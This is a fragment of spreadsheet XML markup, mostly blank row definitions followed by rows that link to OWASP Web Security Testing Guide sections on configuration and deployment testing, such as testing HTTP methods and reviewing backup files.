    <row r="477" ht="12.95" customHeight="1"/>
    <row r="478" ht="12.95" customHeight="1"/>
    <row r="479" ht="12.95" customHeight="1"/>
    <row r="480" ht="12.95" customHeight="1"/>
    <row r="481" ht="12.95" customHeight="1"/>
    <row r="482" ht="12.95" customHeight="1"/>
    <row r="483" ht="12.95" customHeight="1"/>
    <row r="484" ht="12.95" customHeight="1"/>
    <row r="485" ht="12.95" customHeight="1"/>
    <row r="486" ht="12.95" customHeight="1"/>
    <row r="487" ht="12.95" customHeight="1"/>
    <row r="488" ht="12.95" customHeight="1"/>
    <row r="489" ht="12.95" customHeight="1"/>
    <row r="490" ht="12.95" customHeight="1"/>
    <row r="491" ht="12.95" customHeight="1"/>
    <row r="492" ht="12.95" customHeight="1"/>
    <row r="493" ht="12.95" customHeight="1"/>
    <row r="494" ht="12.95" customHeight="1"/>
    <row r="495" ht="12.95" customHeight="1"/>
    <row r="496" ht="12.95" customHeight="1"/>
    <row r="497" ht="12.95" customHeight="1"/>
    <row r="498" ht="12.95" customHeight="1"/>
    <row r="499" ht="12.95" customHeight="1"/>
    <row r="500" ht="12.95" customHeight="1"/>
    <row r="501" ht="12.95" customHeight="1"/>
    <row r="502" ht="12.95" customHeight="1"/>
    <row r="503" ht="12.95" customHeight="1"/>
    <row r="504" ht="12.95" customHeight="1"/>
    <row r="505" ht="12.95" customHeight="1"/>
    <row r="506" ht="12.95" customHeight="1"/>
    <row r="507" ht="12.95" customHeight="1"/>
    <row r="508" ht="12.95" customHeight="1"/>
    <row r="509" ht="12.95" customHeight="1"/>
    <row r="510" ht="12.95" customHeight="1"/>
    <row r="511" ht="12.95" customHeight="1"/>
    <row r="512" ht="12.95" customHeight="1"/>
    <row r="513" ht="12.95" customHeight="1"/>
    <row r="514" ht="12.95" customHeight="1"/>
    <row r="515" ht="12.95" customHeight="1"/>
    <row r="516" ht="12.95" customHeight="1"/>
    <row r="517" ht="12.95" customHeight="1"/>
    <row r="518" ht="12.95" customHeight="1"/>
    <row r="519" ht="12.95" customHeight="1"/>
    <row r="520" ht="12.95" customHeight="1"/>
    <row r="521" ht="12.95" customHeight="1"/>
    <row r="522" ht="12.95" customHeight="1"/>
    <row r="523" ht="12.95" customHeight="1"/>
    <row r="524" ht="12.95" customHeight="1"/>
    <row r="525" ht="12.95" customHeight="1"/>
    <row r="526" ht="12.95" customHeight="1"/>
    <row r="527" ht="12.95" customHeight="1"/>
    <row r="528" ht="12.95" customHeight="1"/>
    <row r="529" ht="12.95" customHeight="1"/>
    <row r="530" ht="12.95" customHeight="1"/>
    <row r="531" ht="12.95" customHeight="1"/>
    <row r="532" ht="12.95" customHeight="1"/>
    <row r="533" ht="12.95" customHeight="1"/>
    <row r="534" ht="12.95" customHeight="1"/>
    <row r="535" ht="12.95" customHeight="1"/>
    <row r="536" ht="12.95" customHeight="1"/>
    <row r="537" ht="12.95" customHeight="1"/>
    <row r="538" ht="12.95" customHeight="1"/>
    <row r="539" ht="12.95" customHeight="1"/>
    <row r="540" ht="12.95" customHeight="1"/>
    <row r="541" ht="12.95" customHeight="1"/>
    <row r="542" ht="12.95" customHeight="1"/>
    <row r="543" ht="12.95" customHeight="1"/>
    <row r="544" ht="12.95" customHeight="1"/>
    <row r="545" ht="12.95" customHeight="1"/>
    <row r="546" ht="12.95" customHeight="1"/>
    <row r="547" ht="12.95" customHeight="1"/>
    <row r="548" ht="12.95" customHeight="1"/>
    <row r="549" ht="12.95" customHeight="1"/>
    <row r="550" ht="12.95" customHeight="1"/>
    <row r="551" ht="12.95" customHeight="1"/>
    <row r="552" ht="12.95" customHeight="1"/>
    <row r="553" ht="12.95" customHeight="1"/>
    <row r="554" ht="12.95" customHeight="1"/>
    <row r="555" ht="12.95" customHeight="1"/>
    <row r="556" ht="12.95" customHeight="1"/>
    <row r="557" ht="12.95" customHeight="1"/>
    <row r="558" ht="12.95" customHeight="1"/>
    <row r="559" ht="12.95" customHeight="1"/>
    <row r="560" ht="12.95" customHeight="1"/>
    <row r="561" ht="12.95" customHeight="1"/>
    <row r="562" ht="12.95" customHeight="1"/>
    <row r="563" ht="12.95" customHeight="1"/>
    <row r="564" ht="12.95" customHeight="1"/>
    <row r="565" ht="12.95" customHeight="1"/>
    <row r="566" ht="12.95" customHeight="1"/>
    <row r="567" ht="12.95" customHeight="1"/>
    <row r="568" ht="12.95" customHeight="1"/>
    <row r="569" ht="12.95" customHeight="1"/>
    <row r="570" ht="12.95" customHeight="1"/>
    <row r="571" ht="12.95" customHeight="1"/>
    <row r="572" ht="12.95" customHeight="1"/>
    <row r="573" ht="12.95" customHeight="1"/>
    <row r="574" ht="12.95" customHeight="1"/>
    <row r="575" ht="12.95" customHeight="1"/>
    <row r="576" ht="12.95" customHeight="1"/>
    <row r="577" ht="12.95" customHeight="1"/>
    <row r="578" ht="12.95" customHeight="1"/>
    <row r="579" ht="12.95" customHeight="1"/>
    <row r="580" ht="12.95" customHeight="1"/>
    <row r="581" ht="12.95" customHeight="1"/>
    <row r="582" ht="12.95" customHeight="1"/>
    <row r="583" ht="12.95" customHeight="1"/>
    <row r="584" ht="12.95" customHeight="1"/>
    <row r="585" ht="12.95" customHeight="1"/>
    <row r="586" ht="12.95" customHeight="1"/>
    <row r="587" ht="12.95" customHeight="1"/>
    <row r="588" ht="12.95" customHeight="1"/>
    <row r="589" ht="12.95" customHeight="1"/>
    <row r="590" ht="12.95" customHeight="1"/>
    <row r="591" ht="12.95" customHeight="1"/>
    <row r="592" ht="12.95" customHeight="1"/>
    <row r="593" ht="12.95" customHeight="1"/>
    <row r="594" ht="12.95" customHeight="1"/>
    <row r="595" ht="12.95" customHeight="1"/>
    <row r="596" ht="12.95" customHeight="1"/>
    <row r="597" ht="12.95" customHeight="1"/>
    <row r="598" ht="12.95" customHeight="1"/>
    <row r="599" ht="12.95" customHeight="1"/>
    <row r="600" ht="12.95" customHeight="1"/>
    <row r="601" ht="12.95" customHeight="1"/>
    <row r="602" ht="12.95" customHeight="1"/>
    <row r="603" ht="12.95" customHeight="1"/>
    <row r="604" ht="12.95" customHeight="1"/>
    <row r="605" ht="12.95" customHeight="1"/>
    <row r="606" ht="12.95" customHeight="1"/>
    <row r="607" ht="12.95" customHeight="1"/>
    <row r="608" ht="12.95" customHeight="1"/>
    <row r="609" ht="12.95" customHeight="1"/>
    <row r="610" ht="12.95" customHeight="1"/>
    <row r="611" ht="12.95" customHeight="1"/>
    <row r="612" ht="12.95" customHeight="1"/>
    <row r="613" ht="12.95" customHeight="1"/>
    <row r="614" ht="12.95" customHeight="1"/>
    <row r="615" ht="12.95" customHeight="1"/>
    <row r="616" ht="12.95" customHeight="1"/>
    <row r="617" ht="12.95" customHeight="1"/>
    <row r="618" ht="12.95" customHeight="1"/>
    <row r="619" ht="12.95" customHeight="1"/>
    <row r="620" ht="12.95" customHeight="1"/>
    <row r="621" ht="12.95" customHeight="1"/>
    <row r="622" ht="12.95" customHeight="1"/>
    <row r="623" ht="12.95" customHeight="1"/>
    <row r="624" ht="12.95" customHeight="1"/>
    <row r="625" ht="12.95" customHeight="1"/>
    <row r="626" ht="12.95" customHeight="1"/>
    <row r="627" ht="12.95" customHeight="1"/>
    <row r="628" ht="12.95" customHeight="1"/>
    <row r="629" ht="12.95" customHeight="1"/>
    <row r="630" ht="12.95" customHeight="1"/>
    <row r="631" ht="12.95" customHeight="1"/>
    <row r="632" ht="12.95" customHeight="1"/>
    <row r="633" ht="12.95" customHeight="1"/>
    <row r="634" ht="12.95" customHeight="1"/>
    <row r="635" ht="12.95" customHeight="1"/>
    <row r="636" ht="12.95" customHeight="1"/>
    <row r="637" ht="12.95" customHeight="1"/>
    <row r="638" ht="12.95" customHeight="1"/>
    <row r="639" ht="12.95" customHeight="1"/>
    <row r="640" ht="12.95" customHeight="1"/>
    <row r="641" ht="12.95" customHeight="1"/>
    <row r="642" ht="12.95" customHeight="1"/>
    <row r="643" ht="12.95" customHeight="1"/>
    <row r="644" ht="12.95" customHeight="1"/>
    <row r="645" ht="12.95" customHeight="1"/>
    <row r="646" ht="12.95" customHeight="1"/>
    <row r="647" ht="12.95" customHeight="1"/>
    <row r="648" ht="12.95" customHeight="1"/>
    <row r="649" ht="12.95" customHeight="1"/>
    <row r="650" ht="12.95" customHeight="1"/>
    <row r="651" ht="12.95" customHeight="1"/>
    <row r="652" ht="12.95" customHeight="1"/>
    <row r="653" ht="12.95" customHeight="1"/>
    <row r="654" ht="12.95" customHeight="1"/>
    <row r="655" ht="12.95" customHeight="1"/>
    <row r="656" ht="12.95" customHeight="1"/>
    <row r="657" ht="12.95" customHeight="1"/>
    <row r="658" ht="12.95" customHeight="1"/>
    <row r="659" ht="12.95" customHeight="1"/>
    <row r="660" ht="12.95" customHeight="1"/>
    <row r="661" ht="12.95" customHeight="1"/>
    <row r="662" ht="12.95" customHeight="1"/>
    <row r="663" ht="12.95" customHeight="1"/>
    <row r="664" ht="12.95" customHeight="1"/>
    <row r="665" ht="12.95" customHeight="1"/>
    <row r="666" ht="12.95" customHeight="1"/>
    <row r="667" ht="12.95" customHeight="1"/>
    <row r="668" ht="12.95" customHeight="1"/>
    <row r="669" ht="12.95" customHeight="1"/>
    <row r="670" ht="12.95" customHeight="1"/>
    <row r="671" ht="12.95" customHeight="1"/>
    <row r="672" ht="12.95" customHeight="1"/>
    <row r="673" ht="12.95" customHeight="1"/>
    <row r="674" ht="12.95" customHeight="1"/>
    <row r="675" ht="12.95" customHeight="1"/>
    <row r="676" ht="12.95" customHeight="1"/>
    <row r="677" ht="12.95" customHeight="1"/>
    <row r="678" ht="12.95" customHeight="1"/>
    <row r="679" ht="12.95" customHeight="1"/>
    <row r="680" ht="12.95" customHeight="1"/>
    <row r="681" ht="12.95" customHeight="1"/>
    <row r="682" ht="12.95" customHeight="1"/>
    <row r="683" ht="12.95" customHeight="1"/>
    <row r="684" ht="12.95" customHeight="1"/>
    <row r="685" ht="12.95" customHeight="1"/>
    <row r="686" ht="12.95" customHeight="1"/>
    <row r="687" ht="12.95" customHeight="1"/>
    <row r="688" ht="12.95" customHeight="1"/>
    <row r="689" ht="12.95" customHeight="1"/>
    <row r="690" ht="12.95" customHeight="1"/>
    <row r="691" ht="12.95" customHeight="1"/>
    <row r="692" ht="12.95" customHeight="1"/>
    <row r="693" ht="12.95" customHeight="1"/>
    <row r="694" ht="12.95" customHeight="1"/>
    <row r="695" ht="12.95" customHeight="1"/>
    <row r="696" ht="12.95" customHeight="1"/>
    <row r="697" ht="12.95" customHeight="1"/>
    <row r="698" ht="12.95" customHeight="1"/>
    <row r="699" ht="12.95" customHeight="1"/>
    <row r="700" ht="12.95" customHeight="1"/>
    <row r="701" ht="12.95" customHeight="1"/>
    <row r="702" ht="12.95" customHeight="1"/>
    <row r="703" ht="12.95" customHeight="1"/>
    <row r="704" ht="12.95" customHeight="1"/>
    <row r="705" ht="12.95" customHeight="1"/>
    <row r="706" ht="12.95" customHeight="1"/>
    <row r="707" ht="12.95" customHeight="1"/>
    <row r="708" ht="12.95" customHeight="1"/>
    <row r="709" ht="12.95" customHeight="1"/>
    <row r="710" ht="12.95" customHeight="1"/>
    <row r="711" ht="12.95" customHeight="1"/>
    <row r="712" ht="12.95" customHeight="1"/>
    <row r="713" ht="12.95" customHeight="1"/>
    <row r="714" ht="12.95" customHeight="1"/>
    <row r="715" ht="12.95" customHeight="1"/>
    <row r="716" ht="12.95" customHeight="1"/>
    <row r="717" ht="12.95" customHeight="1"/>
    <row r="718" ht="12.95" customHeight="1"/>
    <row r="719" ht="12.95" customHeight="1"/>
    <row r="720" ht="12.95" customHeight="1"/>
    <row r="721" ht="12.95" customHeight="1"/>
    <row r="722" ht="12.95" customHeight="1"/>
    <row r="723" ht="12.95" customHeight="1"/>
    <row r="724" ht="12.95" customHeight="1"/>
    <row r="725" ht="12.95" customHeight="1"/>
    <row r="726" ht="12.95" customHeight="1"/>
    <row r="727" ht="12.95" customHeight="1"/>
    <row r="728" ht="12.95" customHeight="1"/>
    <row r="729" ht="12.95" customHeight="1"/>
    <row r="730" ht="12.95" customHeight="1"/>
    <row r="731" ht="12.95" customHeight="1"/>
    <row r="732" ht="12.95" customHeight="1"/>
    <row r="733" ht="12.95" customHeight="1"/>
    <row r="734" ht="12.95" customHeight="1"/>
    <row r="735" ht="12.95" customHeight="1"/>
    <row r="736" ht="12.95" customHeight="1"/>
    <row r="737" ht="12.95" customHeight="1"/>
    <row r="738" ht="12.95" customHeight="1"/>
    <row r="739" ht="12.95" customHeight="1"/>
    <row r="740" ht="12.95" customHeight="1"/>
    <row r="741" ht="12.95" customHeight="1"/>
    <row r="742" ht="12.95" customHeight="1"/>
    <row r="743" ht="12.95" customHeight="1"/>
    <row r="744" ht="12.95" customHeight="1"/>
    <row r="745" ht="12.95" customHeight="1"/>
    <row r="746" ht="12.95" customHeight="1"/>
    <row r="747" ht="12.95" customHeight="1"/>
    <row r="748" ht="12.95" customHeight="1"/>
    <row r="749" ht="12.95" customHeight="1"/>
    <row r="750" ht="12.95" customHeight="1"/>
    <row r="751" ht="12.95" customHeight="1"/>
    <row r="752" ht="12.95" customHeight="1"/>
    <row r="753" ht="12.95" customHeight="1"/>
    <row r="754" ht="12.95" customHeight="1"/>
    <row r="755" ht="12.95" customHeight="1"/>
    <row r="756" ht="12.95" customHeight="1"/>
    <row r="757" ht="12.95" customHeight="1"/>
    <row r="758" ht="12.95" customHeight="1"/>
    <row r="759" ht="12.95" customHeight="1"/>
    <row r="760" ht="12.95" customHeight="1"/>
    <row r="761" ht="12.95" customHeight="1"/>
    <row r="762" ht="12.95" customHeight="1"/>
    <row r="763" ht="12.95" customHeight="1"/>
    <row r="764" ht="12.95" customHeight="1"/>
    <row r="765" ht="12.95" customHeight="1"/>
    <row r="766" ht="12.95" customHeight="1"/>
    <row r="767" ht="12.95" customHeight="1"/>
    <row r="768" ht="12.95" customHeight="1"/>
    <row r="769" ht="12.95" customHeight="1"/>
    <row r="770" ht="12.95" customHeight="1"/>
    <row r="771" ht="12.95" customHeight="1"/>
    <row r="772" ht="12.95" customHeight="1"/>
    <row r="773" ht="12.95" customHeight="1"/>
    <row r="774" ht="12.95" customHeight="1"/>
    <row r="775" ht="12.95" customHeight="1"/>
    <row r="776" ht="12.95" customHeight="1"/>
    <row r="777" ht="12.95" customHeight="1"/>
    <row r="778" ht="12.95" customHeight="1"/>
    <row r="779" ht="12.95" customHeight="1"/>
    <row r="780" ht="12.95" customHeight="1"/>
    <row r="781" ht="12.95" customHeight="1"/>
    <row r="782" ht="12.95" customHeight="1"/>
    <row r="783" ht="12.95" customHeight="1"/>
    <row r="784" ht="12.95" customHeight="1"/>
    <row r="785" ht="12.95" customHeight="1"/>
    <row r="786" ht="12.95" customHeight="1"/>
    <row r="787" ht="12.95" customHeight="1"/>
    <row r="788" ht="12.95" customHeight="1"/>
    <row r="789" ht="12.95" customHeight="1"/>
    <row r="790" ht="12.95" customHeight="1"/>
    <row r="791" ht="12.95" customHeight="1"/>
    <row r="792" ht="12.95" customHeight="1"/>
    <row r="793" ht="12.95" customHeight="1"/>
    <row r="794" ht="12.95" customHeight="1"/>
    <row r="795" ht="12.95" customHeight="1"/>
    <row r="796" ht="12.95" customHeight="1"/>
    <row r="797" ht="12.95" customHeight="1"/>
    <row r="798" ht="12.95" customHeight="1"/>
    <row r="799" ht="12.95" customHeight="1"/>
    <row r="800" ht="12.95" customHeight="1"/>
    <row r="801" ht="12.95" customHeight="1"/>
    <row r="802" ht="12.95" customHeight="1"/>
    <row r="803" ht="12.95" customHeight="1"/>
    <row r="804" ht="12.95" customHeight="1"/>
    <row r="805" ht="12.95" customHeight="1"/>
    <row r="806" ht="12.95" customHeight="1"/>
    <row r="807" ht="12.95" customHeight="1"/>
    <row r="808" ht="12.95" customHeight="1"/>
    <row r="809" ht="12.95" customHeight="1"/>
    <row r="810" ht="12.95" customHeight="1"/>
    <row r="811" ht="12.95" customHeight="1"/>
    <row r="812" ht="12.95" customHeight="1"/>
    <row r="813" ht="12.95" customHeight="1"/>
    <row r="814" ht="12.95" customHeight="1"/>
    <row r="815" ht="12.95" customHeight="1"/>
    <row r="816" ht="12.95" customHeight="1"/>
    <row r="817" ht="12.95" customHeight="1"/>
    <row r="818" ht="12.95" customHeight="1"/>
    <row r="819" ht="12.95" customHeight="1"/>
    <row r="820" ht="12.95" customHeight="1"/>
    <row r="821" ht="12.95" customHeight="1"/>
    <row r="822" ht="12.95" customHeight="1"/>
    <row r="823" ht="12.95" customHeight="1"/>
    <row r="824" ht="12.95" customHeight="1"/>
    <row r="825" ht="12.95" customHeight="1"/>
    <row r="826" ht="12.95" customHeight="1"/>
    <row r="827" ht="12.95" customHeight="1"/>
    <row r="828" ht="12.95" customHeight="1"/>
    <row r="829" ht="12.95" customHeight="1"/>
    <row r="830" ht="12.95" customHeight="1"/>
    <row r="831" ht="12.95" customHeight="1"/>
    <row r="832" ht="12.95" customHeight="1"/>
    <row r="833" ht="12.95" customHeight="1"/>
    <row r="834" ht="12.95" customHeight="1"/>
    <row r="835" ht="12.95" customHeight="1"/>
    <row r="836" ht="12.95" customHeight="1"/>
    <row r="837" ht="12.95" customHeight="1"/>
    <row r="838" ht="12.95" customHeight="1"/>
    <row r="839" ht="12.95" customHeight="1"/>
    <row r="840" ht="12.95" customHeight="1"/>
    <row r="841" ht="12.95" customHeight="1"/>
    <row r="842" ht="12.95" customHeight="1"/>
    <row r="843" ht="12.95" customHeight="1"/>
    <row r="844" ht="12.95" customHeight="1"/>
    <row r="845" ht="12.95" customHeight="1"/>
    <row r="846" ht="12.95" customHeight="1"/>
    <row r="847" ht="12.95" customHeight="1"/>
    <row r="848" ht="12.95" customHeight="1"/>
    <row r="849" ht="12.95" customHeight="1"/>
    <row r="850" ht="12.95" customHeight="1"/>
    <row r="851" ht="12.95" customHeight="1"/>
    <row r="852" ht="12.95" customHeight="1"/>
    <row r="853" ht="12.95" customHeight="1"/>
    <row r="854" ht="12.95" customHeight="1"/>
    <row r="855" ht="12.95" customHeight="1"/>
    <row r="856" ht="12.95" customHeight="1"/>
    <row r="857" ht="12.95" customHeight="1"/>
    <row r="858" ht="12.95" customHeight="1"/>
    <row r="859" ht="12.95" customHeight="1"/>
    <row r="860" ht="12.95" customHeight="1"/>
    <row r="861" ht="12.95" customHeight="1"/>
    <row r="862" ht="12.95" customHeight="1"/>
    <row r="863" ht="12.95" customHeight="1"/>
    <row r="864" ht="12.95" customHeight="1"/>
    <row r="865" ht="12.95" customHeight="1"/>
    <row r="866" ht="12.95" customHeight="1"/>
    <row r="867" ht="12.95" customHeight="1"/>
    <row r="868" ht="12.95" customHeight="1"/>
    <row r="869" ht="12.95" customHeight="1"/>
    <row r="870" ht="12.95" customHeight="1"/>
    <row r="871" ht="12.95" customHeight="1"/>
    <row r="872" ht="12.95" customHeight="1"/>
    <row r="873" ht="12.95" customHeight="1"/>
    <row r="874" ht="12.95" customHeight="1"/>
    <row r="875" ht="12.95" customHeight="1"/>
    <row r="876" ht="12.95" customHeight="1"/>
    <row r="877" ht="12.95" customHeight="1"/>
    <row r="878" ht="12.95" customHeight="1"/>
    <row r="879" ht="12.95" customHeight="1"/>
    <row r="880" ht="12.95" customHeight="1"/>
    <row r="881" ht="12.95" customHeight="1"/>
    <row r="882" ht="12.95" customHeight="1"/>
    <row r="883" ht="12.95" customHeight="1"/>
    <row r="884" ht="12.95" customHeight="1"/>
    <row r="885" ht="12.95" customHeight="1"/>
    <row r="886" ht="12.95" customHeight="1"/>
    <row r="887" ht="12.95" customHeight="1"/>
    <row r="888" ht="12.95" customHeight="1"/>
    <row r="889" ht="12.95" customHeight="1"/>
    <row r="890" ht="12.95" customHeight="1"/>
    <row r="891" ht="12.95" customHeight="1"/>
    <row r="892" ht="12.95" customHeight="1"/>
    <row r="893" ht="12.95" customHeight="1"/>
    <row r="894" ht="12.95" customHeight="1"/>
    <row r="895" ht="12.95" customHeight="1"/>
    <row r="896" ht="12.95" customHeight="1"/>
    <row r="897" ht="12.95" customHeight="1"/>
    <row r="898" ht="12.95" customHeight="1"/>
    <row r="899" ht="12.95" customHeight="1"/>
    <row r="900" ht="12.95" customHeight="1"/>
    <row r="901" ht="12.95" customHeight="1"/>
    <row r="902" ht="12.95" customHeight="1"/>
    <row r="903" ht="12.95" customHeight="1"/>
    <row r="904" ht="12.95" customHeight="1"/>
    <row r="905" ht="12.95" customHeight="1"/>
    <row r="906" ht="12.95" customHeight="1"/>
    <row r="907" ht="12.95" customHeight="1"/>
    <row r="908" ht="12.95" customHeight="1"/>
    <row r="909" ht="12.95" customHeight="1"/>
    <row r="910" ht="12.95" customHeight="1"/>
    <row r="911" ht="12.95" customHeight="1"/>
    <row r="912" ht="12.95" customHeight="1"/>
    <row r="913" ht="12.95" customHeight="1"/>
    <row r="914" ht="12.95" customHeight="1"/>
    <row r="915" ht="12.95" customHeight="1"/>
    <row r="916" ht="12.95" customHeight="1"/>
    <row r="917" ht="12.95" customHeight="1"/>
    <row r="918" ht="12.95" customHeight="1"/>
    <row r="919" ht="12.95" customHeight="1"/>
    <row r="920" ht="12.95" customHeight="1"/>
    <row r="921" ht="12.95" customHeight="1"/>
    <row r="922" ht="12.95" customHeight="1"/>
    <row r="923" ht="12.95" customHeight="1"/>
    <row r="924" ht="12.95" customHeight="1"/>
    <row r="925" ht="12.95" customHeight="1"/>
    <row r="926" ht="12.95" customHeight="1"/>
    <row r="927" ht="12.95" customHeight="1"/>
    <row r="928" ht="12.95" customHeight="1"/>
    <row r="929" ht="12.95" customHeight="1"/>
    <row r="930" ht="12.95" customHeight="1"/>
    <row r="931" ht="12.95" customHeight="1"/>
    <row r="932" ht="12.95" customHeight="1"/>
    <row r="933" ht="12.95" customHeight="1"/>
    <row r="934" ht="12.95" customHeight="1"/>
    <row r="935" ht="12.95" customHeight="1"/>
    <row r="936" ht="12.95" customHeight="1"/>
    <row r="937" ht="12.95" customHeight="1"/>
    <row r="938" ht="12.95" customHeight="1"/>
    <row r="939" ht="12.95" customHeight="1"/>
    <row r="940" ht="12.95" customHeight="1"/>
    <row r="941" ht="12.95" customHeight="1"/>
    <row r="942" ht="12.95" customHeight="1"/>
    <row r="943" ht="12.95" customHeight="1"/>
    <row r="944" ht="12.95" customHeight="1"/>
    <row r="945" ht="12.95" customHeight="1"/>
    <row r="946" ht="12.95" customHeight="1"/>
    <row r="947" ht="12.95" customHeight="1"/>
    <row r="948" ht="12.95" customHeight="1"/>
    <row r="949" ht="12.95" customHeight="1"/>
    <row r="950" ht="12.95" customHeight="1"/>
    <row r="951" ht="12.95" customHeight="1"/>
    <row r="952" ht="12.95" customHeight="1"/>
    <row r="953" ht="12.95" customHeight="1"/>
    <row r="954" ht="12.95" customHeight="1"/>
    <row r="955" ht="12.95" customHeight="1"/>
    <row r="956" ht="12.95" customHeight="1"/>
    <row r="957" ht="12.95" customHeight="1"/>
    <row r="958" ht="12.95" customHeight="1"/>
    <row r="959" ht="12.95" customHeight="1"/>
    <row r="960" ht="12.95" customHeight="1"/>
    <row r="961" ht="12.95" customHeight="1"/>
    <row r="962" ht="12.95" customHeight="1"/>
    <row r="963" ht="12.95" customHeight="1"/>
    <row r="964" ht="12.95" customHeight="1"/>
    <row r="965" ht="12.95" customHeight="1"/>
    <row r="966" ht="12.95" customHeight="1"/>
    <row r="967" ht="12.95" customHeight="1"/>
    <row r="968" ht="12.95" customHeight="1"/>
    <row r="969" ht="12.95" customHeight="1"/>
    <row r="970" ht="12.95" customHeight="1"/>
    <row r="971" ht="12.95" customHeight="1"/>
    <row r="972" ht="12.95" customHeight="1"/>
    <row r="973" ht="12.95" customHeight="1"/>
    <row r="974" ht="12.95" customHeight="1"/>
    <row r="975" ht="12.95" customHeight="1"/>
    <row r="976" ht="12.95" customHeight="1"/>
    <row r="977" ht="12.95" customHeight="1"/>
    <row r="978" ht="12.95" customHeight="1"/>
    <row r="979" ht="12.95" customHeight="1"/>
    <row r="980" ht="12.95" customHeight="1"/>
    <row r="981" ht="12.95" customHeight="1"/>
    <row r="982" ht="12.95" customHeight="1"/>
    <row r="983" ht="12.95" customHeight="1"/>
    <row r="984" ht="12.95" customHeight="1"/>
    <row r="985" ht="12.95" customHeight="1"/>
    <row r="986" ht="12.95" customHeight="1"/>
    <row r="987" ht="12.95" customHeight="1"/>
    <row r="988" ht="12.95" customHeight="1"/>
    <row r="989" ht="12.95" customHeight="1"/>
    <row r="990" ht="12.95" customHeight="1"/>
    <row r="991" ht="12.95" customHeight="1"/>
    <row r="992" ht="12.95" customHeight="1"/>
    <row r="993" ht="12.95" customHeight="1"/>
    <row r="994" ht="12.95" customHeight="1"/>
    <row r="995" ht="12.95" customHeight="1"/>
    <row r="996" ht="12.95" customHeight="1"/>
    <row r="997" ht="12.95" customHeight="1"/>
    <row r="998" ht="12.95" customHeight="1"/>
    <row r="999" ht="12.95" customHeight="1"/>
    <row r="1000" ht="12.95" customHeight="1"/>
  </sheetData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C5FF2-C903-B944-841D-8829870E936E}">
  <sheetPr>
    <tabColor rgb="FFA5A5A5"/>
  </sheetPr>
  <dimension ref="A1:AB944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79.140625" style="2" customWidth="1"/>
    <col min="5" max="5" width="13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17.42578125" style="2" bestFit="1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61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63.95">
      <c r="A5" s="7" t="s">
        <v>63</v>
      </c>
      <c r="B5" s="8" t="s">
        <v>64</v>
      </c>
      <c r="C5" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/01-Test_Network_Infrastructure_Configuration", "Test Network Infrastructure Configuration")</f>
        <v>Test Network Infrastructure Configuration</v>
      </c>
      <c r="D5" s="9" t="s">
        <v>65</v>
      </c>
      <c r="E5" s="11" t="s">
        <v>66</v>
      </c>
      <c r="F5" s="12" t="s">
        <v>67</v>
      </c>
      <c r="G5" s="52" t="s">
        <v>68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9.94999999999999">
      <c r="A6" s="7" t="s">
        <v>69</v>
      </c>
      <c r="B6" s="8" t="s">
        <v>70</v>
      </c>
      <c r="C6" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/02-Test_Application_Platform_Configuration", "Test Application Platform Configuration")</f>
        <v>Test Application Platform Configuration</v>
      </c>
      <c r="D6" s="53" t="s">
        <v>71</v>
      </c>
      <c r="E6" s="16" t="s">
        <v>72</v>
      </c>
      <c r="F6" s="32" t="s">
        <v>73</v>
      </c>
      <c r="G6" s="32" t="s">
        <v>74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3.95">
      <c r="A7" s="7" t="s">
        <v>75</v>
      </c>
      <c r="B7" s="8" t="s">
        <v>76</v>
      </c>
      <c r="C7" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/03-Test_File_Extensions_Handling_for_Sensitive_Information", "Test File Extensions Handling for Sensitive Information")</f>
        <v>Test File Extensions Handling for Sensitive Information</v>
      </c>
      <c r="D7" s="53" t="s">
        <v>77</v>
      </c>
      <c r="E7" s="16" t="s">
        <v>78</v>
      </c>
      <c r="F7" s="32" t="s">
        <v>27</v>
      </c>
      <c r="G7" s="32" t="s">
        <v>79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63.95">
      <c r="A8" s="7" t="s">
        <v>80</v>
      </c>
      <c r="B8" s="8" t="s">
        <v>81</v>
      </c>
      <c r="C8" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/04-Review_Old_Backup_and_Unreferenced_Files_for_Sensitive_Information", "Review Old Backup and Unreferenced Files for Sensitive Information")</f>
        <v>Review Old Backup and Unreferenced Files for Sensitive Information</v>
      </c>
      <c r="D8" s="54" t="s">
        <v>82</v>
      </c>
      <c r="E8" s="16" t="s">
        <v>78</v>
      </c>
      <c r="F8" s="32" t="s">
        <v>27</v>
      </c>
      <c r="G8" s="32" t="s">
        <v>83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8">
      <c r="A9" s="7" t="s">
        <v>84</v>
      </c>
      <c r="B9" s="8" t="s">
        <v>85</v>
      </c>
      <c r="C9" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/05-Enumerate_Infrastructure_and_Application_Admin_Interfaces", "Enumerate Infrastructure and Application Admin Interfaces")</f>
        <v>Enumerate Infrastructure and Application Admin Interfaces</v>
      </c>
      <c r="D9" s="54" t="s">
        <v>86</v>
      </c>
      <c r="E9" s="11" t="s">
        <v>87</v>
      </c>
      <c r="F9" s="32" t="s">
        <v>88</v>
      </c>
      <c r="G9" s="32" t="s">
        <v>89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48">
      <c r="A10" s="7" t="s">
        <v>90</v>
      </c>
      <c r="B10" s="8" t="s">
        <v>91</v>
      </c>
      <c r="C10" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods", "Test HTTP Methods")</f>
        <v>Test HTTP Methods</v>
      </c>
      <c r="D10" s="53" t="s">
        <v>92</v>
      </c>
      <c r="E10" s="18" t="s">
        <v>93</v>
      </c>
      <c r="F10" s="33" t="s">
        <v>94</v>
      </c>
      <c r="G10" s="33" t="s">
        <v>95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48">
      <c r="A11" s="7" t="s">
        <v>96</v>
      </c>
      <c r="B11" s="8" t="s">
        <v>97</v>
      </c>
      <c r="C11" s="9" t="str">
